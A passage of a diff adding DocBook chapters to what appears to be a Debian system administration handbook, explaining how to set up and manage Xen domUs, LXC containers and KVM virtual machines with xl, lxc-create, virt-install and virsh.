+        </listitem>
+        <listitem>
+	  <para>Finally, in the <emphasis>NAT</emphasis> model, the dom0 is
+	  again between the domU systems and the rest of the network, but
+	  the domU systems are not directly accessible from outside, and
+	  traffic goes through some network address translation on the
+	  dom0.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>These three networking nodes involve a number of interfaces
+      with unusual names, such as <filename>vif*</filename>,
+      <filename>veth*</filename>, <filename>peth*</filename> and
+      <filename>xenbr0</filename>. The Xen hypervisor arranges them in
+      whichever layout has been defined, under the control of the
+      user-space tools. Since the NAT and routing models are only adapted to
+      particular cases, we will only address the bridging model.</para>
+
+      <para>The standard configuration of the Xen packages does not change
+      the system-wide network configuration. However, the
+      <command>xend</command> daemon is configured to integrate virtual
+      network interfaces into any pre-existing network bridge (with
+      <filename>xenbr0</filename> taking precedence if several such bridges
+      exist). We must therefore set up a bridge in
+      <filename>/etc/network/interfaces</filename> (which requires
+      installing the <emphasis role="pkg">bridge-utils</emphasis> package,
+      which is why the <emphasis role="pkg">xen-utils-4.4</emphasis> package
+      recommends it) to replace the existing eth0 entry:</para>
+
+      <programlisting>auto xenbr0
+iface xenbr0 inet dhcp
+    bridge_ports eth0
+    bridge_maxwait 0
+    </programlisting>
+
+      <para>After rebooting to make sure the bridge is automatically
+      created, we can now start the domU with the Xen control tools, in
+      particular the <command>xl</command> command. This command allows
+      different manipulations on the domains, including listing them and,
+      starting/stopping them.</para>
+
+      <screen><computeroutput># </computeroutput><userinput>xl list</userinput>
+<computeroutput>Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   463     1     r-----      9.8
+# </computeroutput><userinput>xl create /etc/xen/testxen.cfg</userinput>
+<computeroutput>Parsing config from /etc/xen/testxen.cfg
+# </computeroutput><userinput>xl list</userinput>
+<computeroutput>Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   366     1     r-----     11.4
+testxen                                      1   128     1     -b----      1.1</computeroutput>
+</screen>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Choice of toolstacks to manage Xen VM</title>
+        <indexterm><primary><command>xm</command></primary></indexterm>
+        <indexterm><primary><command>xe</command></primary></indexterm>
+        <para>
+          In Debian 7 and older releases, <command>xm</command> was the reference
+          command line tool to use to manage Xen virtual machines. It has
+          now been replaced by <command>xl</command> which is mostly
+          backwards compatible. But those are not the only available
+          tools: <command>virsh</command> of libvirt and
+          <command>xe</command> of XenServer's XAPI (commercial offering
+          of Xen) are alternative tools.
+        </para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Only one domU per image!</title>
+
+	<para>While it is of course possible to have several domU systems
+	running in parallel, they will all need to use their own image,
+	since each domU is made to believe it runs on its own hardware
+	(apart from the small slice of the kernel that talks to the
+	hypervisor). In particular, it isn't possible for two domU systems
+	running simultaneously to share storage space. If the domU systems
+	are not run at the same time, it is however quite possible to reuse
+	a single swap partition, or the partition hosting the
+	<filename>/home</filename> filesystem.</para>
+      </sidebar>
+
+      <para>Note that the <filename>testxen</filename> domU uses real
+      memory taken from the RAM that would otherwise be available to the
+      dom0, not simulated memory. Care should therefore be taken, when
+      building a server meant to host Xen instances, to provision the
+      physical RAM accordingly.</para>
+
+      <para>Voilà! Our virtual machine is starting up. We can access it in
+      one of two modes. The usual way is to connect to it “remotely”
+      through the network, as we would connect to a real machine; this will
+      usually require setting up either a DHCP server or some DNS
+      configuration. The other way, which may be the only way if the
+      network configuration was incorrect, is to use the
+      <filename>hvc0</filename> console, with the <command>xl
+      console</command> command:</para>
+
+      <screen><computeroutput># </computeroutput><userinput>xl console testxen</userinput>
+<computeroutput>[...]
+
+Debian GNU/Linux 8 testxen hvc0
+
+testxen login: </computeroutput>
+</screen>
+
+      <para>One can then open a session, just like one would do if sitting
+      at the virtual machine's keyboard. Detaching from this console is
+      achieved through the <keycombo action="simul"><keycap>Control</keycap> <keycap>]</keycap></keycombo>
+      key combination.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Getting the console straight away</title>
+
+	<para>Sometimes one wishes to start a domU system and get to its
+	console straight away; this is why the <command>xl create</command>
+	command takes a <literal>-c</literal> switch. Starting a domU with
+	this switch will display all the messages as the system
+	boots.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> OpenXenManager</title>
+
+	<para>OpenXenManager (in the <emphasis role="pkg">openxenmanager</emphasis>
+	package) is a graphical interface allowing remote management
+	of Xen domains via Xen's API. It can thus control Xen domains remotely. It
+	provides most of the features of the <command>xl</command> command.
+	</para>
+      </sidebar>
+
+      <para>Once the domU is up, it can be used just like any other server
+      (since it is a GNU/Linux system after all). However, its virtual
+      machine status allows some extra features. For instance, a domU can
+      be temporarily paused then resumed, with the <command>xl
+      pause</command> and <command>xl unpause</command> commands. Note that
+      even though a paused domU does not use any processor power, its
+      allocated memory is still in use. It may be interesting to consider
+      the <command>xl save</command> and <command>xl restore</command>
+      commands: saving a domU frees the resources that were previously used
+      by this domU, including RAM. When restored (or unpaused, for that
+      matter), a domU doesn't even notice anything beyond the passage of
+      time. If a domU was running when the dom0 is shut down, the packaged
+      scripts automatically save the domU, and restore it on the next boot.
+      This will of course involve the standard inconvenience incurred when
+      hibernating a laptop computer, for instance; in particular, if the
+      domU is suspended for too long, network connections may expire. Note
+      also that Xen is so far incompatible with a large part of ACPI power
+      management, which precludes suspending the host (dom0) system.</para>
+
+      <sidebar>
+        <title><emphasis>DOCUMENTATION</emphasis> <command>xl</command> options</title>
+
+	<para>Most of the <command>xl</command> subcommands expect one or
+	more arguments, often a domU name. These arguments are well
+	described in the <citerefentry><refentrytitle>xl</refentrytitle>
+	<manvolnum>1</manvolnum></citerefentry> manual page.</para>
+      </sidebar>
+
+      <para>Halting or rebooting a domU can be done either from within the
+      domU (with the <command>shutdown</command> command) or from the dom0,
+      with <command>xl shutdown</command> or <command>xl
+      reboot</command>.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Advanced Xen</title>
+
+	<para>Xen has many more features than we can describe in these few
+	paragraphs. In particular, the system is very dynamic, and many
+	parameters for one domain (such as the amount of allocated memory,
+	the visible hard drives, the behavior of the task scheduler, and
+	so on) can be adjusted even when that domain is running. A domU can
+	even be migrated across servers without being shut down, and
+	without losing its network connections! For all these advanced
+	aspects, the primary source of information is the official Xen
+	documentation. <ulink type="block" url="http://www.xen.org/support/documentation.html" /></para>
+      </sidebar>
+    </section>
+    <section id="sect.lxc">
+      <title>LXC</title>
+      <indexterm><primary>LXC</primary></indexterm> 
+
+      <para>Even though it is used to build “virtual machines”, LXC
+      is not, strictly
+      speaking, a virtualization system, but a system to isolate groups of
+      processes from each other even though they all run on the same host.
+      It takes advantage of a set of recent evolutions in the Linux
+      kernel, collectively known as <emphasis>control groups</emphasis>, by
+      which different sets of processes called “groups” have different
+      views of certain aspects of the overall system. Most notable among
+      these aspects are the process identifiers, the network configuration,
+      and the mount points. Such a group of isolated processes will not
+      have any access to the other processes in the system, and its
+      accesses to the filesystem can be restricted to a specific subset. It
+      can also have its own network interface and routing table, and it may
+      be configured to only see a subset of the available devices present
+      on the system.</para>
+
+      <para>These features can be combined to isolate a whole process
+      family starting from the <command>init</command> process, and
+      the resulting set looks very much like a virtual machine. The
+      official name for such a setup is a “container” (hence the LXC
+      moniker: <emphasis>LinuX Containers</emphasis>), but a rather
+      important difference with “real” virtual machines such as
+      provided by Xen or KVM is that there's no second kernel; the
+      container uses the very same kernel as the host system. This has
+      both pros and cons: advantages include excellent performance due
+      to the total lack of overhead, and the fact that the kernel has
+      a global vision of all the processes running on the system, so
+      the scheduling can be more efficient than it would be if two
+      independent kernels were to schedule different task sets. Chief
+      among the inconveniences is the impossibility to run a different
+      kernel in a container (whether a different Linux version or a
+      different operating system altogether).</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> LXC isolation limits</title>
+
+	<para>LXC containers do not provide the level of isolation achieved
+	by heavier emulators or virtualizers. In particular:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>since the kernel is shared among the host system and the
+	    containers, processes constrained to containers can still
+	    access the kernel messages, which can lead to information leaks
+	    if messages are emitted by a container;</para>
+          </listitem>
+          <listitem>
+	    <para>for similar reasons, if a container is compromised and a
+	    kernel vulnerability is exploited, the other containers may be
+	    affected too;</para>
+          </listitem>
+          <listitem>
+	    <para>on the filesystem, the kernel checks permissions
+	    according to the numerical identifiers for users and groups;
+	    these identifiers may designate different users and groups
+	    depending on the container, which should be kept in mind if
+	    writable parts of the filesystem are shared among
+	    containers.</para>
+          </listitem>
+        </itemizedlist>
+      </sidebar>
+
+      <para>Since we are dealing with isolation and not plain
+      virtualization, setting up LXC containers is more complex than just
+      running debian-installer on a virtual machine. We will describe a few
+      prerequisites, then go on to the network configuration; we will then
+      be able to actually create the system to be run in the
+      container.</para>
+      <section>
+        <title>Preliminary Steps</title>
+
+	<para>The <emphasis role="pkg">lxc</emphasis> package contains the
+	tools required to run LXC, and must therefore be installed.</para>
+
+	<para>LXC also requires the <emphasis>control groups</emphasis>
+	configuration system, which is a virtual filesystem to be mounted
+        on <filename>/sys/fs/cgroup</filename>. Since Debian 8 switched to
+        systemd, which also relies on control groups, this is now done
+        automatically at boot time without further configuration.
+	</para>
+      </section>
+      <section id="sect.lxc.network">
+        <title>Network Configuration</title>
+
+	<para>The goal of installing LXC is to set up virtual machines;
+	while we could of course keep them isolated from the network, and
+	only communicate with them via the filesystem, most use cases
+	involve giving at least minimal network access to the containers.
+	In the typical case, each container will get a virtual network
+	interface, connected to the real network through a bridge. This
+	virtual interface can be plugged either directly onto the host's
+	physical network interface (in which case the container is directly
+	on the network), or onto another virtual interface defined on the
+	host (and the host can then filter or route traffic). In both
+	cases, the <emphasis role="pkg">bridge-utils</emphasis> package
+	will be required.</para>
+
+	<para>The simple case is just a matter of editing
+	<filename>/etc/network/interfaces</filename>, moving the
+	configuration for the physical interface (for instance
+	<literal>eth0</literal>) to a bridge interface (usually
+	<literal>br0</literal>), and configuring the link between them. For
+	instance, if the network interface configuration file initially
+	contains entries such as the following:</para>
+
+        <programlisting>auto eth0
+iface eth0 inet dhcp</programlisting>
+
+	<para>They should be disabled and replaced with the
+	following:</para>
+
+        <programlisting>#auto eth0
+#iface eth0 inet dhcp
+
+auto br0
+iface br0 inet dhcp
+  bridge-ports eth0</programlisting>
+
+	<para>The effect of this configuration will be similar to what
+	would be obtained if the containers were machines plugged into the
+	same physical network as the host. The “bridge” configuration
+	manages the transit of Ethernet frames between all the bridged
+	interfaces, which includes the physical <literal>eth0</literal> as
+	well as the interfaces defined for the containers.</para>
+
+	<para>In cases where this configuration cannot be used (for
+	instance if no public IP addresses can be assigned to the
+	containers), a virtual <emphasis>tap</emphasis> interface will be
+	created and connected to the bridge. The equivalent network
+	topology then becomes that of a host with a second network card
+	plugged into a separate switch, with the containers also plugged
+	into that switch. The host must then act as a gateway for the
+	containers if they are meant to communicate with the outside
+	world.</para>
+
+	<para>In addition to <emphasis role="pkg">bridge-utils</emphasis>,
+	this “rich” configuration requires the <emphasis role="pkg">vde2</emphasis> package; the
+	<filename>/etc/network/interfaces</filename> file then
+	becomes:</para>
+
+        <programlisting># Interface eth0 is unchanged
+auto eth0
+iface eth0 inet dhcp
+
+# Virtual interface 
+auto tap0
+iface tap0 inet manual
+  vde2-switch -t tap0
+
+# Bridge for containers
+auto br0
+iface br0 inet static
+  bridge-ports tap0
+  address 10.0.0.1
+  netmask 255.255.255.0
+</programlisting>
+
+	<para>The network can then be set up either statically in the
+	containers, or dynamically with DHCP server running on the host.
+	Such a DHCP server will need to be configured to answer queries on
+	the <literal>br0</literal> interface.</para>
+      </section>
+      <section>
+        <title>Setting Up the System</title>
+
+	<para>Let us now set up the filesystem to be used by the container.
+	Since this “virtual machine” will not run directly on the
+	hardware, some tweaks are required when compared to a standard
+	filesystem, especially as far as the kernel, devices and consoles
+	are concerned. Fortunately, the <emphasis role="pkg">lxc</emphasis>
+	includes scripts that mostly automate this configuration. For
+	instance, the following commands (which require the <emphasis role="pkg">debootstrap</emphasis> and
+	<emphasis role="pkg">rsync</emphasis> packages) will install a Debian
+	container:</para>
+
+        <screen><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-create -n testlxc -t debian
+</userinput><computeroutput>debootstrap is /usr/sbin/debootstrap
+Checking cache download in /var/cache/lxc/debian/rootfs-jessie-amd64 ... 
+Downloading debian minimal ...
+I: Retrieving Release 
+I: Retrieving Release.gpg 
+[...]
+Download complete.
+Copying rootfs to /var/lib/lxc/testlxc/rootfs...
+[...]
+Root password is 'sSiKhMzI', please change !
+root@mirwiz:~# </computeroutput>
+        </screen>
+
+	<para>Note that the filesystem is initially created in
+	<filename>/var/cache/lxc</filename>, then moved to its destination
+	directory. This allows creating identical containers much more
+	quickly, since only copying is then required.</para>
+
+	<para>Note that the debian template creation script accepts
+	an <option>--arch</option> option to specify the architecture
+	of the system to be installed and a <option>--release</option>
+	option if you want to install something else than the current
+	stable release of Debian. You can also set the <literal>MIRROR</literal>
+	environment variable to point to a local Debian mirror.</para>
+
+	<para>The newly-created filesystem now contains a minimal Debian
+        system, and by default the container has no network interface
+        (besides the loopback one). Since this is not really wanted, we will
+	edit the container's configuration file
+	(<filename>/var/lib/lxc/testlxc/config</filename>) and add a
+	few <literal>lxc.network.*</literal> entries:</para>
+
+        <programlisting>lxc.network.type = veth
+lxc.network.flags = up
+lxc.network.link = br0
+lxc.network.hwaddr = 4a:49:43:49:79:20
+</programlisting>
+
+	<para>These entries mean, respectively, that a virtual interface
+	will be created in the container; that it will automatically be
+	brought up when said container is started; that it will
+	automatically be connected to the <literal>br0</literal> bridge on
+	the host; and that its MAC address will be as specified. Should
+	this last entry be missing or disabled, a random MAC address will
+	be generated.</para>
+
+	<para>Another useful entry in that file is the setting of the
+	hostname:</para>
+
+<programlisting>lxc.utsname = testlxc
+</programlisting>
+
+      </section>
+      <section>
+        <title>Starting the Container</title>
+
+	<para>Now that our virtual machine image is ready, let's start the
+	container:</para>
+
+        <screen role="scale" width="94"><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-start --daemon --name=testlxc
+</userinput><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-console -n testlxc
+</userinput><computeroutput>Debian GNU/Linux 8 testlxc tty1
+
+testlxc login: </computeroutput><userinput>root</userinput><computeroutput>
+Password: 
+Linux testlxc 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+root@testlxc:~# </computeroutput><userinput>ps auxwf</userinput>
+<computeroutput>USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+root         1  0.0  0.2  28164  4432 ?        Ss   17:33   0:00 /sbin/init
+root        20  0.0  0.1  32960  3160 ?        Ss   17:33   0:00 /lib/systemd/systemd-journald
+root        82  0.0  0.3  55164  5456 ?        Ss   17:34   0:00 /usr/sbin/sshd -D
+root        87  0.0  0.1  12656  1924 tty2     Ss+  17:34   0:00 /sbin/agetty --noclear tty2 linux
+root        88  0.0  0.1  12656  1764 tty3     Ss+  17:34   0:00 /sbin/agetty --noclear tty3 linux
+root        89  0.0  0.1  12656  1908 tty4     Ss+  17:34   0:00 /sbin/agetty --noclear tty4 linux
+root        90  0.0  0.1  63300  2944 tty1     Ss   17:34   0:00 /bin/login --     
+root       117  0.0  0.2  21828  3668 tty1     S    17:35   0:00  \_ -bash
+root       268  0.0  0.1  19088  2572 tty1     R+   17:39   0:00      \_ ps auxfw
+root        91  0.0  0.1  14228  2356 console  Ss+  17:34   0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102
+root       197  0.0  0.4  25384  7640 ?        Ss   17:38   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.e
+root       266  0.0  0.1  12656  1840 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty5 linux
+root       267  0.0  0.1  12656  1928 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty6 linux
+root@testlxc:~# </computeroutput></screen>
+
+	<para>We are now in the container; our access to the processes
+	is restricted to only those started from the container itself,
+	and our access to the filesystem is similarly restricted to
+	the dedicated subset of the full filesystem
+	(<filename>/var/lib/lxc/testlxc/rootfs</filename>). We can
+	exit the console with <keycombo action="simul"><keycap>Control</keycap>
+	<keycap>a</keycap></keycombo> <keycombo><keycap>q</keycap></keycombo>.</para>
+
+	<para>Note that we ran the container as a background process,
+	thanks to the <option>--daemon</option> option of
+	<command>lxc-start</command>. We can interrupt the
+	container with a command such as <command>lxc-stop
+	--name=testlxc</command>.</para>
+
+	<para>The <emphasis role="pkg">lxc</emphasis> package contains an
+	initialization script that can automatically start one or several
+        containers when the host boots (it relies on
+        <command>lxc-autostart</command> which starts containers whose
+        <literal>lxc.start.auto</literal> option is set to 1). Finer-grained
+        control of the startup order is possible with
+        <literal>lxc.start.order</literal> and <literal>lxc.group</literal>:
+        by default, the initialization script first starts containers which are
+        part of the <literal>onboot</literal> group and then the containers
+        which are not part of any group. In both cases, the order within a group
+        is defined by the <literal>lxc.start.order</literal> option.
+        </para>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Mass virtualization</title>
+
+	  <para>Since LXC is a very lightweight isolation system, it can be
+	  particularly adapted to massive hosting of virtual servers. The
+	  network configuration will probably be a bit more advanced than
+	  what we described above, but the “rich” configuration using
+	  <literal>tap</literal> and <literal>veth</literal> interfaces
+	  should be enough in many cases.</para>
+
+	  <para>It may also make sense to share part of the filesystem,
+	  such as the <filename>/usr</filename> and
+	  <filename>/lib</filename> subtrees, so as to avoid duplicating
+	  the software that may need to be common to several containers.
+	  This will usually be achieved with
+	  <literal>lxc.mount.entry</literal> entries in the containers
+	  configuration file. An interesting side-effect is that the
+	  processes will then use less physical memory, since the kernel is
+	  able to detect that the programs are shared. The marginal cost of
+	  one extra container can then be reduced to the disk space
+	  dedicated to its specific data, and a few extra processes that
+	  the kernel must schedule and manage.</para>
+
+	  <para>We haven't described all the available options, of course;
+	  more comprehensive information can be obtained from the
+	  <citerefentry> <refentrytitle>lxc</refentrytitle>
+	  <manvolnum>7</manvolnum> </citerefentry> and <citerefentry>
+	  <refentrytitle>lxc.container.conf</refentrytitle>
+	  <manvolnum>5</manvolnum></citerefentry> manual pages and the ones
+	  they reference.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section>
+      <title>Virtualization with KVM</title>
+      <indexterm><primary>KVM</primary></indexterm>
+
+      <para>KVM, which stands for <emphasis>Kernel-based Virtual
+      Machine</emphasis>, is first and foremost a kernel module providing
+      most of the infrastructure that can be used by a virtualizer, but it
+      is not a virtualizer by itself. Actual control for the virtualization
+      is handled by a QEMU-based application. Don't worry if this section
+      mentions <command>qemu-*</command> commands: it is still about
+      KVM.</para>
+
+      <para>Unlike other virtualization systems, KVM was merged into the
+      Linux kernel right from the start. Its developers chose to take
+      advantage of the processor instruction sets dedicated to
+      virtualization (Intel-VT and AMD-V), which keeps KVM lightweight,
+      elegant and not resource-hungry. The counterpart, of course, is that
+      KVM doesn't work on any computer but only on those with appropriate
+      processors. For x86-based computers, you can verify that you have
+      such a processor by looking for “vmx” or “svm” in the CPU flags
+      listed in <filename>/proc/cpuinfo</filename>.</para>
+
+      <para>With Red Hat actively supporting its development, KVM has
+      more or less become the reference for Linux
+      virtualization.</para>
+      <section>
+        <title>Preliminary Steps</title>
+        <indexterm><primary><command>virt-install</command></primary></indexterm>
+
+	<para>Unlike such tools as VirtualBox, KVM itself doesn't include
+	any user-interface for creating and managing virtual machines. The
+	<emphasis role="pkg">qemu-kvm</emphasis> package only provides an
+	executable able to start a virtual machine, as well as an
+	initialization script that loads the appropriate kernel
+	modules.</para>
+        <indexterm><primary>libvirt</primary></indexterm>
+        <indexterm><primary><emphasis role="pkg">virt-manager</emphasis></primary></indexterm>
+
+	<para>Fortunately, Red Hat also provides another set of tools to
+	address that problem, by developing the
+	<emphasis>libvirt</emphasis> library and the associated
+	<emphasis>virtual machine manager</emphasis> tools. libvirt allows managing
+	virtual machines in a uniform way, independently of the
+	virtualization system involved behind the scenes (it currently
+	supports QEMU, KVM, Xen, LXC, OpenVZ, VirtualBox, VMWare and UML).
+	<command>virtual-manager</command> is a graphical interface that
+	uses libvirt to create and manage virtual machines.</para>
+        <indexterm><primary><emphasis role="pkg">virtinst</emphasis></primary></indexterm>
+
+	<para>We first install the required packages, with <command>apt-get
+	install qemu-kvm libvirt-bin virtinst virt-manager
+	virt-viewer</command>. <emphasis role="pkg">libvirt-bin</emphasis>
+	provides the <command>libvirtd</command> daemon, which allows
+	(potentially remote) management of the virtual machines running of
+	the host, and starts the required VMs when the host boots. In
+	addition, this package provides the <command>virsh</command>
+	command-line tool, which allows controlling the
+	<command>libvirtd</command>-managed machines.</para>
+
+	<para>The <emphasis role="pkg">virtinst</emphasis> package provides
+	<command>virt-install</command>, which allows creating virtual
+	machines from the command line. Finally, <emphasis role="pkg">virt-viewer</emphasis> allows accessing a VM's graphical
+	console.</para>
+      </section>
+      <section>
+        <title>Network Configuration</title>
+
+	<para>Just as in Xen and LXC, the most frequent network
+	configuration involves a bridge grouping the network interfaces of
+	the virtual machines (see <xref linkend="sect.lxc.network" />).</para>
+
+	<para>Alternatively, and in the default configuration provided by
+	KVM, the virtual machine is assigned a private address (in the
+	192.168.122.0/24 range), and NAT is set up so that the VM can
+	access the outside network.</para>
+
+	<para>The rest of this section assumes that the host has an
+	<literal>eth0</literal> physical interface and a
+	<literal>br0</literal> bridge, and that the former is connected to
+	the latter.</para>
+      </section>
+      <section>
+        <title>Installation with <command>virt-install</command></title>
+        <indexterm><primary><command>virt-install</command></primary></indexterm>
+
+	<para>Creating a virtual machine is very similar to installing a
+	normal system, except that the virtual machine's characteristics
+	are described in a seemingly endless command line.</para>
+
+	<para>Practically speaking, this means we will use the Debian
+	installer, by booting the virtual machine on a virtual DVD-ROM
+	drive that maps to a Debian DVD image stored on the host system.
+	The VM will export its graphical console over the VNC protocol (see
+	<xref linkend="sect.remote-desktops" /> for details), which will
+	allow us to control the installation process.</para>
+
+	<para>We first need to tell libvirtd where to store the disk
+	images, unless the default location
+	(<filename>/var/lib/libvirt/images/</filename>) is fine.</para>
+
+        <screen><computeroutput>root@mirwiz:~# </computeroutput><userinput>mkdir /srv/kvm</userinput>
+<computeroutput>root@mirwiz:~# </computeroutput><userinput>virsh pool-create-as srv-kvm dir --target /srv/kvm</userinput>
+<computeroutput>Pool srv-kvm created
+
+root@mirwiz:~# </computeroutput></screen>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> Add your user to the libvirt group</title>
+          <para>All samples in this section assume that you are running commands
+          as root. Effectively, if you want to control a local libvirt
+          daemon, you need either to be root or to be a member of the
+          <literal>libvirt</literal> group (which is not the case by
+          default). Thus if you want to avoid using root rights too often,
+          you can add yoursel to the <literal>libvirt</literal> group and
+          run the various commands under your user identity.</para>
+        </sidebar>
+
+	<para>Let us now start the installation process for the virtual
+	machine, and have a closer look at
+	<command>virt-install</command>'s most important options. This
+	command registers the virtual machine and its parameters in
+	libvirtd, then starts it so that its installation can
+	proceed.</para>
+
+        <screen><computeroutput># </computeroutput><userinput>virt-install --connect qemu:///system  <co id="virtinst.connect"></co>
+               --virt-type kvm           <co id="virtinst.type"></co>
+               --name testkvm            <co id="virtinst.name"></co>
+               --ram 1024                <co id="virtinst.ram"></co>
+               --disk /srv/kvm/testkvm.qcow,format=qcow2,size=10 <co id="virtinst.disk"></co>
+               --cdrom /srv/isos/debian-8.1.0-amd64-netinst.iso  <co id="virtinst.cdrom"></co>
+               --network bridge=br0      <co id="virtinst.network"></co>
+               --vnc                     <co id="virtinst.vnc"></co>
+               --os-type linux           <co id="virtinst.os"></co>
+               --os-variant debianwheezy
+</userinput><computeroutput>
+Starting install...
+Allocating 'testkvm.qcow'             |  10 GB     00:00
+Creating domain...                    |    0 B     00:00
+Guest installation complete... restarting guest.
+</computeroutput>
+</screen>
+        <calloutlist>
+          <callout arearefs="virtinst.connect">
+	    <para>The <literal>--connect</literal> option specifies the
+	    “hypervisor” to use. Its form is that of an URL containing
+	    a virtualization system (<literal>xen://</literal>,
+	    <literal>qemu://</literal>, <literal>lxc://</literal>,
+	    <literal>openvz://</literal>, <literal>vbox://</literal>, and
+	    so on) and the machine that should host the VM (this can be
+	    left empty in the case of the local host). In addition to that,
+	    and in the QEMU/KVM case, each user can manage virtual machines
+	    working with restricted permissions, and the URL path allows
+	    differentiating “system” machines
+	    (<literal>/system</literal>) from others
+	    (<literal>/session</literal>).</para>
+          </callout>
+          <callout arearefs="virtinst.type">
+	    <para>Since KVM is managed the same way as QEMU, the
+	    <literal>--virt-type kvm</literal> allows specifying the use of
+	    KVM even though the URL looks like QEMU.</para>
+          </callout>
+          <callout arearefs="virtinst.name">
+	    <para>The <literal>--name</literal> option defines a (unique)
+	    name for the virtual machine.</para>
+          </callout>
+          <callout arearefs="virtinst.ram">
+	    <para>The <literal>--ram</literal> option allows specifying the
+	    amount of RAM (in MB) to allocate for the virtual
+	    machine.</para>
+          </callout>
+          <callout arearefs="virtinst.disk">
+	    <para>The <literal>--disk</literal> specifies the location of
+	    the image file that is to represent our virtual machine's hard
+	    disk; that file is created, unless present, with a size (in GB)
+	    specified by the <literal>size</literal> parameter. The
+	    <literal>format</literal> parameter allows choosing among
+	    several ways of storing the image file. The default format
+	    (<literal>raw</literal>) is a single file exactly matching the
+	    disk's size and contents. We picked a more advanced format
+	    here, that is specific to QEMU and allows starting with a small
+	    file that only grows when the virtual machine starts actually
+	    using space.</para>
+          </callout>
+          <callout arearefs="virtinst.cdrom">
+	    <para>The <literal>--cdrom</literal> option is used to indicate
+	    where to find the optical disk to use for installation. The
+	    path can be either a local path for an ISO file, an URL where
+	    the file can be obtained, or the device file of a physical
+	    CD-ROM drive (i.e. <literal>/dev/cdrom</literal>).</para>
+          </callout>
+          <callout arearefs="virtinst.network">
+	    <para>The <literal>--network</literal> specifies how the
+	    virtual network card integrates in the host's network
+	    configuration. The default behavior (which we explicitly
+	    forced in our example) is to integrate it into any pre-existing
+	    network bridge. If no such bridge exists, the virtual machine
+	    will only reach the physical network through NAT, so it gets an
+	    address in a private subnet range (192.168.122.0/24).</para>
+          </callout>
+          <callout arearefs="virtinst.vnc">
+	    <para><literal>--vnc</literal> states that the graphical
+	    console should be made available using VNC. The default
+	    behavior for the associated VNC server is to only listen on
+	    the local interface; if the VNC client is to be run on a
+	    different host, establishing the connection will require
+	    setting up an SSH tunnel (see <xref linkend="sect.ssh-port-forwarding" />). Alternatively, the
+	    <literal>--vnclisten=0.0.0.0</literal> can be used so that the
+	    VNC server is accessible from all interfaces; note that if you
+	    do that, you really should design your firewall
+	    accordingly.</para>
+          </callout>
+          <callout arearefs="virtinst.os">
+	    <para>The <literal>--os-type</literal> and
+	    <literal>--os-variant</literal> options allow optimizing a few
+	    parameters of the virtual machine, based on some of the known
+	    features of the operating system mentioned there.</para>
+          </callout>
+        </calloutlist>
+
+	<para>At this point, the virtual machine is running, and we need to
+	connect to the graphical console to proceed with the installation
+	process. If the previous operation was run from a graphical desktop
+	environment, this connection should be automatically started. If
+	not, or if we operate remotely, <command>virt-viewer</command> can
+	be run from any graphical environment to open the graphical console
+	(note that the root password of the remote host is asked twice because
+	the operation requires 2 SSH connections):</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>virt-viewer --connect qemu+ssh://root@<replaceable>server</replaceable>/system testkvm
+</userinput><computeroutput>root@server's password: 
+root@server's password: </computeroutput>
+</screen>
+
+	<para>When the installation process ends, the virtual machine is
+	restarted, now ready for use.</para>
+      </section>
+      <section>
+        <title>Managing Machines with <command>virsh</command></title>
+        <indexterm><primary><command>virsh</command></primary></indexterm>
+
+	<para>Now that the installation is done, let us see how to handle
+	the available virtual machines. The first thing to try is to ask
+	<command>libvirtd</command> for the list of the virtual machines it
+	manages:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system list --all
+ Id Name                 State
+----------------------------------
+  - testkvm              shut off
+</userinput>
+</screen>
+
+	<para>Let's start our test virtual machine:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system start testkvm
+</userinput><computeroutput>Domain testkvm started</computeroutput>
+</screen>
+
+	<para>We can now get the connection instructions for the graphical
+	console (the returned VNC display can be given as parameter
+	to <command>vncviewer</command>):</para>
+
+        <screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system vncdisplay testkvm
+</userinput><computeroutput>:0</computeroutput>
+</screen>
+
+	<para>Other available <command>virsh</command> subcommands
+	include:</para>
+        <itemizedlist>
+          <listitem>
+	    <para><literal>reboot</literal> to restart a virtual
+	    machine;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>shutdown</literal> to trigger a clean
+	    shutdown;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>destroy</literal>, to stop it brutally;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>suspend</literal> to pause it;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>resume</literal> to unpause it;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>autostart</literal> to enable (or disable, with
+	    the <literal>--disable</literal> option) starting the virtual
+	    machine automatically when the host starts;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>undefine</literal> to remove all traces of the
+	    virtual machine from <command>libvirtd</command>.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>All these subcommands take a virtual machine identifier as a
+	parameter.</para>
+      </section>
+      <section>
